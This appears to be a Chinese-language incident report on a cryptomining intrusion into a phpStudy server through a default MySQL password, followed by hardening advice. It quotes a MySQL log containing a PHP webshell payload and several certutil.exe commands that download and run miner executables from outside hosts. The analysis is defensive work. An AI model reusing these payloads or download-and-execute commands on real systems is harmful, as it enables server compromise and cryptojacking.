针对phpStudy网站服务器的入侵

今天客户服务器上出现报警，查找了下原因，发现根目录下有wk.php

E:\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
         2173 Quit    
190207 18:31:59     2174 Connect    root@localhost on 
         2174 Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci'
         2174 Init DB    mysql
         2174 Init DB    mysql
         2174 Query    SELECT '<?php @system("certutil.exe -urlcache -split -f http://m4.rui2.net/upload/12/2016/10/wk.exe");@phpinfo();@system("certutil.exe -urlcache -split -f http://14.29.194.121:22/server_sql.php");@sleep(2);@system('wk.exe');?>'
         2174 Query    SHOW VARIABLES LIKE 'language'
         2174 Quit    
190207 18:32:00     2175 Connect    root@localhost on 
         2175 Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci'
         2175 Init DB    mysql
         2175 Init DB    mysql
         2175 Query    set global general_log='off'

查了下原因，是针对phpStudy网站服务器进行批量入侵的挖矿木马

攻击者对互联网上的服务器进行批量扫描，发现易受攻击的phpStudy系统后，利用用户在安装时未进行修改的MySQL弱密码进行登录，并进一步植入WebShell，然后通过shell下载挖矿木马挖门罗币。

 

 中招主机通过phpStudy一键部署PHP环境，默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问，同时安装的MySQL默认口令为弱口令密码root/root，且开启在外网3306端口，在未设置安全组或者安全组为放通全端口的情况下，受到攻击者对于phpStudy的针对性探测，并且暴露了其MySQL弱口令。

特点：

　　（1）都是通过探测phpStudy搭建的php环境进行攻击

　　（2）通过webshell植入挖矿木马时，白利用certutil.exe

命令1

certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe

命令2

certutil.exe  -urlcache  -split  -f  http://m4.rui2.net/upload/12/2016/10/wk.exe  &wk.exe

　　（3）挖矿木马通过bat脚本启动，且矿机采用xmr-stak挖矿工具

　　（4）在挖矿的同时植入大灰狼远控木马

安全建议：

　　（1）修复系统漏洞

　　（2）集成环境，在安装结束后应及时修改MySQL密码为强密码，最低密码长度不要低于11位，组合最好是字母数字和符号；删除l.php（探针文件），避免被黑客探测入侵

　　（3）增加安全策略

参考：https://s.tencent.com/research/report/642.html